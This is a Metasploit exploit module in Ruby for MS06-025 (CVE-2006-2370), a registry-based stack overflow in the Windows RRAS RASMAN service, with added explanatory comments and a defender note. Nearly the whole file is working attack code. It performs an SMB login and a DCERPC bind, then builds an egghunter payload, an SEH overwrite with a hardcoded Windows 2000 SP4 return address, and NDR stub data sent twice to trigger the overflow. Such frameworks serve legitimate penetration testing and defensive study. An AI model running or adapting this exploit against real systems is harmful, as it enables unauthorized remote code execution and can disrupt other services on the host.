##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for MS06-025 (CVE-2006-2370), a registry-based stack overflow
# in the Windows RASMAN service.
#
# Layout of this class:
#   initialize - module metadata, payload constraints, the single target and the SMBPIPE option
#   autofilter - opts the module out of automated runs
#   exploit    - SMB login, DCERPC bind over the named pipe, then the RPC call issued twice
#
# Defender note: per the Description below, an attempt (successful or not) leaves a
# persistent registry artifact ("RAS Phonebook" under HKEY_USERS\.DEFAULT) that blocks
# further attempts on that host; its presence is a host-based indicator of an attempt,
# and the Description also warns that a failure can take down other svchost-hosted services.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # Mixins supplying the helpers used in exploit(): generate_egghunter,
  # dcerpc_handle/dcerpc_bind/dcerpc, and connect/smb_login/disconnect.
  # (Attribution of each helper to a mixin is by name; confirm against the framework.)
  include Msf::Exploit::Remote::Egghunter
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  # Registers module metadata and the SMBPIPE option.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS06-025 Microsoft RRAS Service RASMAN Registry Overflow',
      'Description'    => %q{
          This module exploits a registry-based stack buffer overflow in the Windows Routing
        and Remote Access Service. Since the service is hosted inside svchost.exe,
        a failed exploit attempt can cause other system services to fail as well.
        A valid username and password is required to exploit this flaw on Windows 2000.
        When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
        Exploiting this flaw involves two distinct steps - creating the registry key
        and then triggering an overwrite based on a read of this key. Once the key is
        created, it cannot be recreated. This means that for any given system, you
        only get one chance to exploit this flaw. Picking the wrong target will require
        a manual removal of the following registry key before you can try again:
        HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
      },
      'Author'         => [ 'pusscat', 'hdm' ],
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-2370' ],
          [ 'OSVDB', '26437' ],
          [ 'BID', '18325' ],
          [ 'MSB', 'MS06-025' ]
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      # Constraints handed to the payload encoder: maximum encoded size and the
      # byte values the encoded payload must not contain.
      'Payload'        =>
        {
          'Space'    => 512,
          'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      # A single target is defined; the Description explains why a wrong target
      # costs the only attempt available on a given host.
      'Targets'        =>
        [
          [ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ], # call esi
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2006-06-13'))

    # Named pipe used to reach the RPC interface (the Description says XP SP1 needs 'SRVSVC').
    # NOTE(review): the option description string "Rawr." is not informative; a real
    # description naming the pipe's purpose would help operators and documentation.
    register_options(
      [
        OptString.new('SMBPIPE', [ true, "Rawr.", 'router']),
      ])
  end

  # Post authentication bugs are rarely useful during automation
  # Returning false here excludes the module from automated exploitation runs.
  def autofilter
    false
  end

  # Runs the exploit against the current target.
  #
  # Sequence as written below: SMB connect and login, bind to the DCERPC interface
  # over the SMBPIPE named pipe, build the NDR stub (type1 wrapping type2, followed
  # by the egg data), then call opnum 0xA twice. The status messages state that the
  # first call creates the registry key and the second triggers the overwrite.
  # A NoResponse raised by either call is rescued and ignored, presumably because
  # the second call is not expected to return normally.
  def exploit
    connect()
    smb_login()
    print_status("Trying target #{target.name}...")

    # Generate the egghunter payload
    # hunter[0] is the egghunter stub placed into the overflow buffer below;
    # hunter[1] is the egg (the tagged payload) placed into eggdata.
    hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
    egg = hunter[1]

    # Pick a "filler" character that we know doesn't get mangled
    # by the wide string conversion routines
    filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
    # .chr keeps the picked value a one-character String regardless of what String#[] returns.
    fil = filset[ rand(filset.length) ].chr

    # Bind to the actual DCERPC interface
    # Interface UUID and version, transported over a named pipe (ncacn_np) whose
    # name comes from the SMBPIPE option.
    handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
    print_status("Binding to #{handle}")
    dcerpc_bind(handle)
    print_status("Bound to #{handle}")

    # Add giant blocks of guard data before and after the egg
    eggdata =
      fil * 1024 +
      egg +
      fil * 1024

    # Place the egghunter where ESI happens to point
    # The stub overwrites the filler starting at offset 84.
    bof = (fil * 178)
    bof[84, hunter[0].length] = hunter[0]

    # Overwrite the SEH ptr, even though ESP is smashed
    # The handle after the ret must be an invalid address
    pat =
      (fil * 886) +
      NDR.long(target.ret) +
      (fil * 3) + "\xc0" +
      bof

    # Inner structure: three NUL-terminated strings (the second carries pat) and two longs.
    type2 =
      NDR.string( (fil * 1024) + "\x00" ) +
      NDR.string( pat + "\x00" ) +
      NDR.string( (fil * 4096) + "\x00" ) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff))

    # Outer structure; the trailing comments name the fields the longs stand for.
    # Their values are random because only the type2 section is relied upon.
    type1 =
      NDR.long(rand(0xffffffff)) + # OperatorDial
      NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
      NDR.long(rand(0xffffffff)) + # UseLocation
      NDR.long(rand(0xffffffff)) + # ShowLights
      NDR.long(rand(0xffffffff)) + # ShowConnectStatus
      NDR.long(rand(0xffffffff)) + # CloseOnDial
      NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits
      NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits
      NDR.long(rand(0xffffffff)) + # SkipConnectComplete
      NDR.long(rand(0xffffffff)) + # NewEntryWizard
      NDR.long(rand(0xffffffff)) + # RedialAttempts
      NDR.long(rand(0xffffffff)) + # RedialSeconds
      NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds
      NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure
      NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing
      NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery
      NDR.long(rand(0xffffffff)) + # CallbackMode

      NDR.long(0x45) + type2 + # Parsed by CallbackListFromRpc
      NDR.wstring("\x00" * 129) +
      NDR.long(rand(0xffffffff)) +
      NDR.wstring("\x00" * 520) +
      NDR.wstring("\x00" * 520) +

      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff)) +

      NDR.string("\x00" * 514) +

      NDR.long(rand(0xffffffff)) +
      NDR.long(rand(0xffffffff))

    # Full request body: type1, one more long, then the egg surrounded by guard data.
    stubdata =
      type1 +
      NDR.long(rand(0xffffffff)) +
      eggdata

    print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')

    begin
      # The same stub is sent twice; the return values are never read.
      print_status('Creating the malicious registry key...')
      response = dcerpc.call(0xA, stubdata)

      print_status('Attempting to trigger the base pointer overwrite...')
      response = dcerpc.call(0xA, stubdata)

    # Deliberately swallowed: a service that stops answering surfaces as NoResponse.
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    end

    handler
    disconnect
  end
end